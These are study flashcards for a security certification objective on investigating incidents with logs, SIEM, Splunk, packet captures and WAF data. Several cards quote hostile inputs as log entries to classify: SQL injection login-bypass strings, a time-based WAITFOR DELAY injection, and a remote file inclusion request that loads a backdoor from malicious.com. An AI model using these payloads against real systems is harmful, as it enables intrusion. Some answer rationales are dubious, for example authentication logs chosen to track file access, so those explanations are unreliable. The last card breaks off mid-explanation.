Investigating an Incident Flashcards
Objective 4.9: Given a scenario, you must be able to use data sources to support an investigation
Your organization has deployed a SIEM to monitor security events. You need to configure it properly to ensure meaningful alerts while avoiding excessive data overload. What is the best approach?
A) Collect all log data from every system on the network.
B) Adjust the SIEM’s sensitivity level to balance security monitoring and resource usage.
C) Disable correlation features to reduce processing load.
D) Increase the alert threshold to ignore authentication failures.
✅ Correct Answer: B - Adjust the SIEM’s sensitivity level to balance security monitoring and resource usage.
🔹 Explanation of Options:
(A)❌ Collecting all logs is impractical and will overload the SIEM, leading to performance issues.
(B)✅ Adjusting sensitivity levels ensures that only the most relevant security events are logged, improving efficiency.
(C)❌ Disabling correlation reduces the ability to detect patterns in attacks, weakening security.
(D)❌ Ignoring authentication failures could prevent detection of brute-force attacks or unauthorized access attempts.
A security analyst needs to investigate failed login attempts on Linux servers. Which tool should they use?
A) NetFlow
B) NXLog
C) JournalCTL
D) Syslog-ng
✅ Correct Answer: C - JournalCTL
🔹 Explanation of Options:
(A)❌ NetFlow is for network traffic monitoring, not system logs.
(B)❌ NXLog is a log management tool but not specific to Linux.
(C)✅ JournalCTL queries system logs in Linux (journald), making it the best choice.
(D)❌ Syslog-ng centralizes logs but lacks the same filtering capabilities as JournalCTL.
Your security team needs to detect data exfiltration in real-time. Which monitoring tool is the best choice?
A) NetFlow
B) sFlow
C) IPFIX
D) Journald
✅ Correct Answer: B - sFlow
🔹 Explanation of Options:
(A)❌ NetFlow provides detailed traffic summaries but has export delays.
(B)✅ sFlow captures random packet samples immediately, making it ideal for real-time monitoring.
(C)❌ IPFIX is mainly used for billing and accounting rather than real-time security monitoring.
(D)❌ Journald is a Linux log system, not a network monitoring tool.
Your SIEM is receiving logs from multiple sources, but timestamps are inconsistent across different logs. What is the best solution?
A) Convert all timestamps to UTC.
B) Ignore logs with different time formats.
C) Configure the SIEM to detect local time zones automatically.
D) Only analyze logs using the company’s default time zone.
✅ Correct Answer: A - Convert all timestamps to UTC
🔹 Explanation of Options:
(A)✅ Standardizing timestamps to UTC ensures logs from different time zones align properly.
(B)❌ Ignoring logs could result in missing key security events.
(C)❌ Automatic time zone detection may cause inconsistencies and conflicts.
(D)❌ Restricting to one time zone can cause discrepancies when investigating global events.
Which log type would be most useful for investigating whether an attacker has accessed restricted files?
A) Authentication logs
B) Web logs
C) DNS logs
D) System logs
✅ Correct Answer: A - Authentication logs
🔹 Explanation of Options:
(A)✅ Authentication logs track user login attempts, providing insight into unauthorized access.
(B)❌ Web logs record website visits but don’t track file access.
(C)❌ DNS logs track domain name requests, not file access.
(D)❌ System logs provide general OS events but may not directly show file access patterns.
A network admin needs a standardized method to export network flow data for both billing and security monitoring. Which tool should they use?
A) NetFlow
B) sFlow
C) IPFIX
D) NXLog
✅ Correct Answer: C - IPFIX
🔹 Explanation of Options:
(A)❌ NetFlow is Cisco-proprietary, while IPFIX is an open standard.
(B)❌ sFlow captures sampled data but lacks detailed billing capabilities.
(C)✅ IPFIX is a universal flow export standard used in billing and security monitoring.
(D)❌ NXLog is for log management, not network flow exporting.
An analyst is investigating a suspected phishing attack. What type of metadata would be most useful?
A) File metadata
B) Mobile metadata
C) Email metadata
D) Web metadata
✅ Correct Answer: C - Email metadata
🔹 Explanation of Options:
(A)❌ File metadata provides details about documents, not phishing emails.
(B)❌ Mobile metadata tracks call details, irrelevant to phishing emails.
(C)✅ Email metadata helps analyze sender details, email headers, and timestamps to track phishing sources.
(D)❌ Web metadata shows website visits but doesn’t trace phishing emails.
Which log management tool is best for a company that needs Windows, Linux, and Unix compatibility?
A) Syslog-ng
B) NXLog
C) JournalCTL
D) NetFlow
✅ Correct Answer: B - NXLog
🔹 Explanation of Options:
(A)❌ Syslog-ng is mainly for Unix/Linux, not cross-platform.
(B)✅ NXLog works across Windows, Linux, and Unix, making it the best choice.
(C)❌ JournalCTL is Linux-specific and cannot manage Windows logs.
(D)❌ NetFlow is for network traffic monitoring, not log management.
Your SIEM is slowing down due to excessive log data. What is the best way to optimize performance?
A) Reduce sensor sensitivity to collect fewer logs.
B) Disable log collection from low-priority systems.
C) Increase storage and processing power to handle all logs.
D) Implement log filtering to collect only relevant security events.
✅ Correct Answer: D - Implement log filtering to collect only relevant security events
🔹 Explanation of Options:
(A)❌ Reducing sensitivity might cause important events to be missed.
(B)❌ Disabling low-priority logs could lead to blind spots in security monitoring.
(C)❌ Increasing storage is a temporary fix but doesn’t improve efficiency.
(D)✅ Log filtering ensures that only the most critical logs are collected.
A company has deployed Splunk to monitor security threats across its infrastructure. Which of the following best describes Splunk’s primary function?
A) A security appliance that actively blocks threats.
B) A big data platform that collects and indexes security-related data.
C) A firewall designed to filter malicious network traffic.
D) A replacement for SIEM solutions.
✅ Correct Answer: B - A big data platform that collects and indexes security-related data
🔹 Explanation of Options:
(A)❌ Splunk is not a security appliance; it analyzes and visualizes data but does not block threats.
(B)✅ Splunk is a powerful data analytics tool that collects, indexes, and processes security data from multiple sources.
**(C)❌ Firewalls control traffic flow, but Splunk is used for log analysis and security insights.
**(D)❌ While Splunk integrates with SIEM tools, it does not fully replace traditional SIEM solutions.
A security analyst logs into Splunk and needs a quick summary of security alerts across multiple systems. What feature should they use?
A) Raw log data view
B) Dashboards
C) Command-line interface
D) Packet capture utility
✅ Correct Answer: B - Dashboards
🔹 Explanation of Options:
(A)❌ Raw log data is useful but not as efficient for quick summaries.
**(B)✅ Dashboards provide a graphical overview of system activity, making them ideal for incident response.
(C)❌ A command-line interface can query data but lacks visual summaries.
(D)❌ Packet capture utilities analyze network traffic but are not a part of Splunk’s dashboard feature.
A company’s Splunk dashboard is showing a rising number of threat counts over the past 24 hours. What does this indicate?
A) The organization is detecting an increased number of security threats.
B) The system is experiencing hardware failure.
C) The company’s antivirus software is malfunctioning.
D) The Splunk server is under a denial-of-service (DoS) attack.
✅ Correct Answer: A - The organization is detecting an increased number of security threats
🔹 Explanation of Options:
(A)✅ A rise in threat counts means more malicious activity is being detected.
(B)❌ Hardware failures are unrelated to threat counts.
(C)❌ Antivirus issues would likely generate different alerts, not an increase in threat counts.
(D)❌ A DoS attack would cause performance issues but wouldn’t directly increase threat counts in Splunk.
Which of the following best describes the Single Pane of Glass concept in Splunk?
A) A tool that blocks cyberattacks before they happen.
B) A dashboard that consolidates security data from multiple systems into one view.
C) A physical security camera monitoring system.
D) A new type of firewall security protocol.
✅ Correct Answer: B - A dashboard that consolidates security data from multiple systems into one view
🔹 Explanation of Options:
(A)❌ Splunk does not proactively block attacks; it analyzes security data.
**(B)✅ A Single Pane of Glass provides a unified view of multiple data sources, helping analysts respond efficiently.
(C)❌ Security camera monitoring systems are unrelated to Splunk.
**(D)❌ Firewalls operate at the network level, while the Single Pane of Glass concept is for data visualization.
Which of the following data sources can be ingested into Splunk?
A) Firewalls
B) Intrusion Detection Systems (IDS)
C) Endpoint security logs
D) All of the above
✅ Correct Answer: D - All of the above
🔹 Explanation of Options:
(A)✅ Firewalls generate logs on network traffic, which can be analyzed in Splunk.
(B)✅ IDS alerts can be ingested into Splunk for correlation with other security data.
(C)✅ Endpoint security logs provide insights into malware infections and unauthorized access.
(D)✅ Splunk collects data from multiple sources, making (D) the best answer.
A security analyst wants to monitor security incidents over time using Splunk. What feature should they use?
A) Packet inspection tools
B) Dashboards
C) SIEM correlation rules
D) Antivirus scan logs
✅ Correct Answer: B - Dashboards
🔹 Explanation of Options:
(A)❌ Packet inspection tools focus on real-time network traffic, not long-term trends.
**(B)✅ Dashboards help visualize security trends over time, making them the best choice.
(C)❌ SIEM correlation rules help analyze attack patterns but do not provide trend visualization.
**(D)❌ Antivirus scan logs show malware detection history but do not present broad security trends.
A company wants to track trends in malicious activity using Splunk. What feature should they use?
A) Threat Counts
B) Packet captures
C) System error logs
D) DNS cache records
✅ Correct Answer: A - Threat Counts
🔹 Explanation of Options:
(A)✅ Threat Counts track security threats over time and help assess trends in attacks.
(B)❌ Packet captures analyze network traffic but are not used for tracking trends.
(C)❌ System error logs focus on hardware/software issues, not security threats.
(D)❌ DNS cache records track website lookups, not malicious activity trends.
A security analyst starts an incident investigation and needs a central starting point to gather security insights. What should they use?
A) Command-line queries
B) The Splunk Dashboard
C) Network firewall settings
D) System performance logs
✅ Correct Answer: B - The Splunk Dashboard
🔹 Explanation of Options:
(A)❌ Command-line queries are powerful but not an ideal starting point.
**(B)✅ Dashboards provide an overview of security incidents, making them the best starting point.
(C)❌ Network firewall settings focus on access control, not security analysis.
(D)❌ System performance logs track hardware and application performance, not security threats.
Your organization uses an automated report system to track security incidents. Which of the following best describes an automated report?
A) A manually written document prepared by an IT analyst.
B) A report that is automatically generated by a security tool at scheduled intervals.
C) A document created only after a major security breach.
D) A report that only logs hardware failures.
✅ Correct Answer: B - A report that is automatically generated by a security tool at scheduled intervals.
🔹 Explanation of Options:
(A)❌ Automated reports are system-generated, not manually written.
**(B)✅ Automated reports are generated at set intervals by security tools like EDR, SIEM, or antivirus software.
(C)❌ Reports are generated regularly, not just after major incidents.
(D)❌ They track security threats, not just hardware failures.
Which of the following is NOT typically included in an automated security incident report?
A) Report ID
B) Executive Summary
C) User Social Security Numbers
D) Incident Details
✅ Correct Answer: C - User Social Security Numbers
🔹 Explanation of Options:
(A)✅ A Report ID is a unique identifier for tracking incidents.
(B)✅ The Executive Summary gives a brief overview of the report.
(C)❌ Sensitive personal data like SSNs should never be included in security reports.
(D)✅ Incident Details contain timestamps, affected systems, and actions taken.
In an automated security report, incidents are categorized by severity levels. A brute-force attack on an admin account leading to multiple failed login attempts would most likely be classified as:
A) Informational
B) Moderate
C) High
D) Critical
✅ Correct Answer: C - High
🔹 Explanation of Options:
(A)❌ Informational alerts track non-threatening events like software installations.
(B)❌ Moderate alerts are for suspicious activity that needs review but is not immediately dangerous.
(C)✅ High alerts include multiple failed login attempts, indicating a possible brute-force attack.
(D)❌ Critical alerts involve confirmed major threats (e.g., ransomware execution or confirmed data breach).
An automated security report flags a critical alert for suspicious file access at 4:53 AM, outside of normal working hours. What is the best first step in investigating this incident?
A) Immediately delete the affected user account.
B) Verify whether the activity matches known ransomware patterns.
C) Ignore it, as employees may work late hours.
D) Restart the file server to clear any suspicious processes.
✅ Correct Answer: B - Verify whether the activity matches known ransomware patterns.
🔹 Explanation of Options:
(A)❌ Deleting the account immediately may disrupt operations. Investigation is needed first.
(B)✅ Matching the behavior to known ransomware footprints helps determine if the alert is a true security threat.
(C)❌ Ignoring alerts without investigation can allow security breaches to go undetected.
(D)❌ Restarting the server doesn’t address the cause of the suspicious activity.
A security report identifies a malicious IP address communicating with an internal system. What automated response would be most appropriate?
A) Blocking the IP address to prevent further communication.
B) Sending a report and waiting for manual intervention.
C) Notifying the user and allowing them to decide whether to block the connection.
D) Deleting all network logs related to the suspicious activity.
✅ Correct Answer: A - Blocking the IP address to prevent further communication.
🔹 Explanation of Options:
(A)✅ Automatically blocking a malicious IP is a standard incident response action.
(B)❌ Waiting for manual intervention could allow further damage.
(C)❌ Users should not decide whether to block a security threat.
(D)❌ Deleting logs hides evidence and hinders investigations.
An automated report flags unusual outbound traffic from a database server to an external IP address. What should the security team do next?
A) Assume it is a scheduled backup and ignore it.
B) Analyze the destination IP to determine if it is a trusted source.
C) Reset all user passwords in the organization.
D) Permanently disconnect the database server.
✅ Correct Answer: B - Analyze the destination IP to determine if it is a trusted source.
🔹 Explanation of Options:
(A)❌ Assuming it’s a backup without verification is a security risk.
(B)✅ Investigating the destination IP helps determine if the traffic is benign or malicious.
(C)❌ Resetting all passwords is unnecessary unless a confirmed breach has occurred.
(D)❌ Disconnecting the database permanently would disrupt business operations.
An automated report flags that user msmith installed FileZilla FTP software on Workstation 22. What is the best first step in investigating this?
A) Immediately fire the employee for violating policy.
B) Check if the file hash matches a known safe version.
C) Assume it was a legitimate installation and take no further action.
D) Format the workstation to eliminate any possible threats.
✅ Correct Answer: B - Check if the file hash matches a known safe version.
🔹 Explanation of Options:
(A)❌ Firing an employee without investigation is an overreaction.
(B)✅ Verifying the file hash ensures the software was not modified or malicious.
(C)❌ Assuming legitimacy without verification is a security risk.
(D)❌ Formatting the workstation is unnecessary unless a threat is confirmed.
Which of the following sections of an automated report provides a high-level summary of security incidents for decision-makers?
A) Incident Details
B) Executive Summary
C) Appendices
D) Security Recommendations
✅ Correct Answer: B - Executive Summary
🔹 Explanation of Options:
(A)❌ Incident Details provide timestamps, affected systems, and technical data, not a high-level overview.
(B)✅ The Executive Summary allows decision-makers to quickly assess the report’s relevance.
**(C)❌ Appendices contain supporting logs and raw data but not a summary.
**(D)❌ Security Recommendations suggest mitigation steps, not a summary of findings.
A cybersecurity analyst runs a vulnerability scan across a company’s network. After receiving the automated vulnerability scan report, what should be their first step before sharing it with executives?
A) Immediately forward the report to executives without reviewing it.
B) Perform an analysis to validate whether the detected vulnerabilities are real.
C) Delete any findings that appear to be false positives.
D) Only focus on the vulnerabilities labeled as Critical and ignore the rest.
✅ Correct Answer: B - Perform an analysis to validate whether the detected vulnerabilities are real.
🔹 Explanation of Options:
(A)❌ Forwarding the report without analysis can lead to confusion and misinterpretation.
(B)✅ Validating vulnerabilities ensures false positives are removed, and critical issues are addressed appropriately.
(C)❌ Deleting findings without verification may lead to ignoring real threats.
(D)❌ Focusing only on Critical vulnerabilities overlooks High/Medium risks, which could still be exploited.
A vulnerability scan flags a critical Windows patch vulnerability on a Linux server. What does this indicate?
A) A true positive that requires immediate patching.
B) A false positive due to incorrect vulnerability identification.
C) A configuration issue in the Linux server’s firewall.
D) A misconfiguration in the Windows update settings.
✅ Correct Answer: B - A false positive due to incorrect vulnerability identification.
🔹 Explanation of Options:
(A)❌ Linux servers don’t use Windows patches, so this is likely incorrect.
**(B)✅ This is a false positive since Windows vulnerabilities don’t apply to Linux systems.
(C)❌ Firewalls don’t determine the presence of software vulnerabilities.
(D)❌ Windows update settings are irrelevant on a Linux machine.
A vulnerability affecting Microsoft Exchange Server has a CVSS score of 9.1, while another affecting a single workstation has a CVSS score of 7.5. Why does the Exchange Server vulnerability have a higher score?
A) Workstations are more secure than Exchange Servers.
B) Exchange Server vulnerabilities impact a larger number of users.
C) The workstation vulnerability requires authentication, making it more dangerous.
D) CVSS scores are randomly assigned by security teams.
✅ Correct Answer: B - Exchange Server vulnerabilities impact a larger number of users.
🔹 Explanation of Options:
(A)❌ Workstations are not inherently more secure.
**(B)✅ A compromised Exchange Server affects email for an entire organization, increasing risk.
(C)❌ Authentication does not always make a vulnerability more dangerous.
(D)❌ CVSS scores are based on an industry-standard formula, not random assignments.
Which of the following describes an unauthenticated attacker?
A) An insider with valid login credentials misusing their access.
B) An attacker outside the organization exploiting an open RDP port.
C) An employee using admin privileges to alter financial records.
D) A user who failed to install the latest Windows patch.
✅ Correct Answer: B - An attacker outside the organization exploiting an open RDP port.
🔹 Explanation of Options:
**(A)❌ An authenticated attacker is an insider threat.
**(B)✅ An unauthenticated attacker has no prior access and exploits public-facing vulnerabilities.
**(C)❌ Misusing admin privileges is an insider threat.
(D)❌ Not installing updates is risky, but it doesn’t define an attacker.
A vulnerability scan flags 50% of company workstations as missing a five-year-old security patch. What should the cybersecurity team report to executives?
A) The presence of a patch management problem in the organization.
B) Each workstation’s individual vulnerabilities in detail.
C) Only a list of vulnerabilities rated Critical.
D) Ignore the finding since the patch is old.
✅ Correct Answer: A - The presence of a patch management problem in the organization.
🔹 Explanation of Options:
**(A)✅ A widespread missing patch indicates a systemic issue with patch management.
**(B)❌ Listing individual workstation vulnerabilities overwhelms executives with too much data.
**(C)❌ Focusing only on Critical vulnerabilities ignores trends affecting overall security.
(D)❌ Old vulnerabilities can still be exploited if left unpatched.
A medium-severity vulnerability (CVSS 6.5) affecting an Apache Druid server allows remote code execution but requires a specifically crafted request. What does this mean?
A) It is difficult to exploit, but still poses a risk.
B) It is an informational finding with no security risk.
C) The vulnerability should be ignored due to its medium severity.
D) It should be classified as Critical because it allows remote code execution.
✅ Correct Answer: A - It is difficult to exploit, but still poses a risk.
🔹 Explanation of Options:
**(A)✅ Some vulnerabilities require complex attack methods, making them less critical but still important.
**(B)❌ Remote code execution is a security risk, not just an informational finding.
**(C)❌ Medium-severity vulnerabilities should still be evaluated.
**(D)❌ CVSS scoring considers exploitation difficulty, so not all RCE vulnerabilities are Critical.
A vulnerability scan detects multiple outdated SSL certificates and unused services running on several machines. What should the security team do?
A) Immediately disable all services, even if they are needed.
B) Investigate whether the SSL certificates and services are still in use.
C) Ignore the issue since it is a low-severity finding.
D) Recommend that all employees update their passwords.
✅ Correct Answer: B - Investigate whether the SSL certificates and services are still in use.
🔹 Explanation of Options:
**(A)❌ Disabling essential services may cause downtime.
**(B)✅ If services or certificates are unused, they should be removed to reduce attack surface.
**(C)❌ Even low-severity issues should be reviewed to ensure they don’t become larger threats.
(D)❌ Password updates do not resolve SSL certificate or service misconfiguration issues.
A legacy server is flagged for a Log4j vulnerability (CVE-2021-44228). The scan report states that the risk is mitigated by network controls. What should be done next?
A) No further action is required since it is already mitigated.
B) Completely remove the legacy server from the network.
C) Verify that the network controls are sufficient and monitor for potential risks.
D) Increase the CVSS score since it’s a known high-profile vulnerability.
✅ Correct Answer: C - Verify that the network controls are sufficient and monitor for potential risks.
🔹 Explanation of Options:
**(A)❌ Even mitigated vulnerabilities should be reviewed to ensure ongoing security.
**(B)❌ Removing a legacy server may not be possible if it’s still in use.
**(C)✅ Reviewing mitigations ensures the system remains protected from exploitation.
(D)❌ CVSS scores are standardized; they don’t change based on individual security controls.
A security analyst is tasked with monitoring network activity and decides to use packet capture software. What is the primary purpose of a packet capture?
A) To capture all incoming and outgoing data on a network device.
B) To modify traffic between devices for security testing.
C) To automatically block malicious IP addresses.
D) To replace the need for firewall logs.
✅ Correct Answer: A - To capture all incoming and outgoing data on a network device.
🔹 Explanation of Options:
(A)✅ Packet captures log all network traffic for analysis.
(B)❌ Packet captures only observe traffic; they do not modify it.
(C)❌ Blocking traffic is the function of firewalls or intrusion prevention systems (IPS).
(D)❌ Firewalls and packet captures serve different roles—firewalls filter traffic, while packet captures record it.
A security analyst notices that the Time column in a packet capture does not show a traditional date and time format. Instead, it displays elapsed time. What does this indicate?
A) The timestamps are corrupted and cannot be used.
B) The packet capture is showing time relative to the start of the capture.
C) The network clock is misconfigured.
D) The packet capture is using a faulty packet sniffer.
✅ Correct Answer: B - The packet capture is showing time relative to the start of the capture.
🔹 Explanation of Options:
(A)❌ The timestamps are not corrupted; this is standard behavior.
(B)✅ Packet captures show the time elapsed since the capture began, allowing analysts to track packet timing.
(C)❌ A misconfigured network clock affects log synchronization, not packet captures.
(D)❌ Packet sniffers are designed to collect data, not modify timestamp formats.
A packet capture shows multiple SYN packets being sent to various ports on a single destination IP without receiving SYN-ACK responses. What type of attack is most likely occurring?
A) Distributed Denial of Service (DDoS) attack
B) SYN Flood attack
C) Port Scan
D) Man-in-the-Middle (MITM) attack
✅ Correct Answer: C - Port Scan
🔹 Explanation of Options:
(A)❌ A DDoS attack involves multiple sources targeting a single destination.
(B)❌ A SYN flood overwhelms a server with half-open connections, but this scenario describes scanning different ports.
(C)✅ A Port Scan sends SYN packets to different ports on a single IP to identify open ports.
(D)❌ MITM attacks involve intercepting communications rather than scanning ports.
A packet capture reveals a large number of SYN packets sent from a single source IP to a single destination, but no SYN-ACK responses are observed. What attack type does this indicate?
A) Normal TCP handshake process
B) SYN Flood attack
C) DNS Spoofing attack
D) SQL Injection attack
✅ Correct Answer: B - SYN Flood attack
🔹 Explanation of Options:
(A)❌ A normal TCP handshake includes SYN, SYN-ACK, and ACK packets. Here, SYN-ACK responses are missing.
(B)✅ A SYN Flood attack occurs when an attacker sends numerous SYN requests but never completes the handshake, exhausting server resources.
(C)❌ DNS Spoofing manipulates domain name resolution, unrelated to SYN packets.
(D)❌ SQL Injection attacks exploit databases, not network packets.
A security analyst notices multiple SYN packets targeting the same destination IP, but they originate from different source IP addresses. What does this indicate?
A) A misconfigured firewall
B) A Distributed Denial of Service (DDoS) attack
C) A network performance issue
D) A normal communication pattern
✅ Correct Answer: B - A Distributed Denial of Service (DDoS) attack
🔹 Explanation of Options:
(A)❌ A misconfigured firewall might allow malicious traffic but does not generate SYN floods.
(B)✅ A DDoS attack uses multiple compromised devices (botnets) to flood a target with requests, exhausting resources.
(C)❌ Network performance issues are unrelated to SYN packet floods.
(D)❌ A high volume of SYN requests from multiple sources targeting one server is not normal.
On the exam, packet captures will typically be:
A) Full network logs containing gigabytes of data.
B) Short snippets with 5 to 20 lines of packet data.
C) A live capture requiring real-time analysis.
D) Packets from multiple networks mixed together.
✅ Correct Answer: B - Short snippets with 5 to 20 lines of packet data.
🔹 Explanation of Options:
(A)❌ Full network logs are impractical for exam questions.
(B)✅ The exam provides small snippets for analysis, focusing on key attack indicators.
(C)❌ The exam does not require live analysis, only interpretation of given data.
(D)❌ Exam packet captures are structured, not randomly mixed from different networks.
In a packet capture, the Protocol column shows different values. Which of the following protocols is most commonly seen in packet captures?
A) TCP and UDP
B) ICMP and ARP only
C) SMTP and POP3
D) DNS and HTTP only
✅ Correct Answer: A - TCP and UDP
🔹 Explanation of Options:
(A)✅ TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are the two primary transport layer protocols in network traffic.
(B)❌ ICMP and ARP appear, but TCP and UDP are more common in standard network traffic.
(C)❌ SMTP and POP3 are email-related protocols, not primary transport protocols.
(D)❌ DNS and HTTP are application-layer protocols; TCP/UDP operate at the transport layer.
A packet capture shows a Length column with all packets having a length of 74 bytes. What does this indicate?
A) The packets are likely part of an attack pattern.
B) The network has no issues, and this is normal behavior.
C) The packets contain large data payloads.
D) The capture software is corrupted and cannot analyze packet size.
✅ Correct Answer: A - The packets are likely part of an attack pattern.
🔹 Explanation of Options:
(A)✅ Attack patterns often involve small, uniform packets, such as SYN floods or port scans.
(B)❌ Consistently small packet sizes could indicate scanning, not normal behavior.
(C)❌ 74-byte packets are small; large payloads require much larger packet sizes.
(D)❌ Capture software is unlikely to misreport length data.
A security analyst reviews a firewall log snippet and notices that all inbound connection attempts from 185.76.9.23 to 192.168.1.105 on ports 22, 80, 443, and 8080 were blocked. What does this most likely indicate?
A) A SYN flood attack targeting a specific server.
B) A port scan attempting to discover open services.
C) A Distributed Denial of Service (DDoS) attack.
D) A normal firewall operation allowing traffic.
✅ Correct Answer: B - A port scan attempting to discover open services.
🔹 Explanation of Options:
(A)❌ SYN floods generate numerous SYN packets, but this log shows scanning of multiple ports.
(B)✅ The log shows an attacker systematically probing different ports, indicating a port scan.
(C)❌ DDoS attacks involve high traffic from multiple sources; this log only shows one source IP.
(D)❌ Since the firewall blocked all attempts, this was not normal traffic flow.
A web application firewall log contains the following suspicious request:
GET /index.php?id=’OR ‘1’=’1’ –
What type of attack does this indicate?
A) Local File Inclusion (LFI)
B) SQL Injection
C) Cross-Site Scripting (XSS)
D) Directory Traversal
✅ Correct Answer: B - SQL Injection
🔹 Explanation of Options:
(A)❌ LFI exploits file-loading mechanisms, not SQL queries.
(B)✅ The ‘1’=’1’ condition is a common SQL Injection attempt used to bypass authentication.
(C)❌ XSS injects malicious scripts into a webpage, not SQL queries.
(D)❌ Directory traversal involves accessing restricted directories, not manipulating SQL queries.
A WAF log contains the following entry:
POST /login.php HTTP/1.1 → Response: 403 Forbidden
What does the 403 status code indicate?
A) The request was successfully processed.
B) The request was blocked due to access restrictions.
C) The login credentials were incorrect.
D) The login request resulted in a syntax error.
✅ Correct Answer: B - The request was blocked due to access restrictions.
🔹 Explanation of Options:
(A)❌ A successful request would return a 200 status code.
(B)✅ A 403 Forbidden response means the server rejected the request due to security policies.
(C)❌ Incorrect login credentials usually result in a 401 Unauthorized response, not 403.
(D)❌ A syntax error in SQL queries might result in a 500 Internal Server Error, not 403.
A firewall log shows the following search query request:
GET /search?q=’; WAITFOR DELAY ‘00:00:10’ –
What is the attacker trying to do?
A) Exploit time-based SQL injection by causing the database to delay its response.
B) Perform directory traversal to access restricted files.
C) Inject a cross-site scripting (XSS) attack into a web application.
D) Execute a remote file inclusion (RFI) attack.
✅ Correct Answer: A - Exploit time-based SQL injection by causing the database to delay its response.
🔹 Explanation of Options:
(A)✅ The WAITFOR DELAY SQL function is used in time-based SQL injection to detect vulnerabilities.
(B)❌ Directory traversal involves navigating system directories (e.g., ../../etc/passwd).
(C)❌ XSS involves inserting malicious scripts into web pages, not SQL queries.
(D)❌ RFI loads external files from remote servers but does not interact with SQL databases.
A WAF log detects an attempt to execute the following command:
GET /index.php?file=http://malicious.com/backdoor.php
Which type of attack does this indicate?
A) SQL Injection
B) Cross-Site Scripting (XSS)
C) Remote File Inclusion (RFI)
D) SYN Flood
✅ Correct Answer: C - Remote File Inclusion (RFI)
🔹 Explanation of Options:
(A)❌ SQL injection manipulates database queries, not file loading mechanisms.
(B)❌ XSS attacks inject JavaScript into webpages, but this attack loads an external file.
(C)✅ The RFI attack attempts to load an external malicious file, exploiting poor input validation.
(D)❌ SYN floods overwhelm servers with connection requests but do not involve file inclusion.
A firewall log shows blocked inbound connections on ports 22, 80, and 443 from a suspicious IP. What type of firewall is likely blocking these requests?
A) Layer 7 Web Application Firewall (WAF)
B) Layer 4 Firewall (Network Firewall)
C) Intrusion Detection System (IDS)
D) Stateful Packet Inspection (SPI)
✅ Correct Answer: B - Layer 4 Firewall (Network Firewall)
🔹 Explanation of Options:
(A)❌ WAF operates at Layer 7 and blocks attacks based on content, not just ports.
(B)✅ Layer 4 firewalls filter traffic based on ports and IP addresses, making them responsible for blocking port scans.
(C)❌ IDS detects intrusions but does not actively block traffic.
(D)❌ SPI examines packets but is typically part of a Layer 4 firewall.
During the exam, what type of firewall log snippets should you expect to analyze?
A) Full firewall logs with thousands of lines of data.
B) Short logs with 10-20 lines, focusing on specific attack attempts.
C) Live network captures requiring real-time monitoring.
D) Mixed logs from different networks with random data.
✅ Correct Answer: B - Short logs with 10-20 lines, focusing on specific attack attempts.
🔹 Explanation of Options:
(A)❌ Full logs are too large for an exam scenario.
(B)✅ Exam logs are small snippets, highlighting clear attack patterns.
(C)❌ The exam does not require real-time packet capture monitoring.
(D)❌ Exam logs are structured to test knowledge, not random logs.
A web application firewall log shows an attempt to log in with the following credentials:
Username: admin’ OR ‘1’=’1’ –
Password: password123
What is the attacker trying to do?
A) Perform a brute-force attack.
B) Inject SQL commands to bypass authentication.
C) Execute a denial-of-service attack.
D) Exploit cross-site scripting (XSS).
✅ Correct Answer: B - Inject SQL commands to bypass authentication.
🔹 Explanation of Options:
(A)❌ Brute-force attacks use multiple login attempts, not SQL injections.
(B)✅ The attacker is using SQL injection (‘1’=’1’) to force a true condition and gain unauthorized access.
(C)❌ DoS attacks flood a server with traffic but do not involve login attempts.
(D)❌ XSS attacks inject JavaScript, not SQL queries.
A security analyst is reviewing application logs on a Windows system. Where is the most likely location for these logs?
A) Inside the individual application’s folder.
B) In a centralized logging system like SIEM or Syslog server.
C) In the Windows Event Viewer Application Log.
D) All of the above.
✅ Correct Answer: D - All of the above.
🔹 Explanation of Options:
(A)✅ Application logs may be stored locally inside their own folders.
(B)✅ Logs can also be sent to SIEM or Syslog servers for centralized monitoring.
**(C)✅ In Windows systems, application logs are stored in Windows Event Viewer.
(D)✅ Since logs can be stored in multiple locations, all of the above is the correct answer.
A Windows Event Viewer log shows the following sequence of events:
1️⃣ A document named ‘Q3-Financials.docx’ was opened.
2️⃣ A macro execution attempt was blocked.
3️⃣ A macro security alert was triggered.
4️⃣ The macro code was scanned and matched known malware.
5️⃣ The file was quarantined.
What should the security team conclude from these logs?
A) The document contains a malicious macro and was successfully blocked.
B) The document is safe, and the macro execution was a false positive.
C) The user manually disabled macros, preventing execution.
D) The security system failed to detect the malware.
✅ Correct Answer: A - The document contains a malicious macro and was successfully blocked.
🔹 Explanation of Options:
(A)✅ The log shows a macro was detected, scanned, and confirmed as malware. The system quarantined the file, preventing harm.
(B)❌ Since the macro matched known malware, this is not a false positive.
(C)❌ The security system blocked it, rather than the user manually disabling macros.
(D)❌ The logs confirm that the malware was detected and neutralized.
A Microsoft Word document contains a macro, and when opened, the following message appears:
⚠ “Macros have been disabled. Enable Content?”
What is the safest action the user should take?
A) Immediately enable the macro to allow the document to function.
B) Only enable macros if the document is from a trusted source.
C) Ignore the warning and close the document.
D) Run the macro in a sandboxed environment to analyze its behavior.
✅ Correct Answer: B - Only enable macros if the document is from a trusted source.
🔹 Explanation of Options:
(A)❌ Enabling macros without verification could activate malware.
(B)✅ Macros can be useful, but they should only be enabled from trusted sources.
(C)❌ Ignoring the warning without analyzing the source doesn’t provide security assurance.
(D)✅ Running macros in a sandbox is a safe approach, but not always necessary for every macro.
A Windows Event Viewer application log contains the following suspicious activity:
🔹 Event ID 5400 - Macro execution attempt blocked.
🔹 Event ID 5401 - Macro security alert triggered.
🔹 Event ID 5402 - Macro scan completed: Malware detected.
🔹 Event ID 5403 - File quarantined: Q3-Financials.docx.
🔹 Event ID 5409 - Admin alert generated for malicious macro.
What best describes the security response?
A) The document was allowed to run, and the system was infected.
B) The macro was detected and successfully quarantined.
C) The user ignored the macro security alert and enabled the macro.
D) The log data is inconclusive, requiring further investigation.
✅ Correct Answer: B - The macro was detected and successfully quarantined.
🔹 Explanation of Options:
(A)❌ The log confirms the file was quarantined, meaning the system was not infected.
(B)✅ Security controls blocked and quarantined the malicious macro, preventing harm.
(C)❌ The logs show that security automatically handled the threat.
(D)❌ The data clearly shows a malware response was taken.
A system administrator is investigating frequent application crashes on a Windows machine. Where should they look first?
A) Network logs
B) Windows Event Viewer → Application Logs
C) Windows Registry
D) Task Manager
✅ Correct Answer: B - Windows Event Viewer → Application Logs.
🔹 Explanation of Options:
(A)❌ Network logs track network activity, not application errors.
(B)✅ The Windows Event Viewer Application Log records software crashes, making it the best place to start troubleshooting.
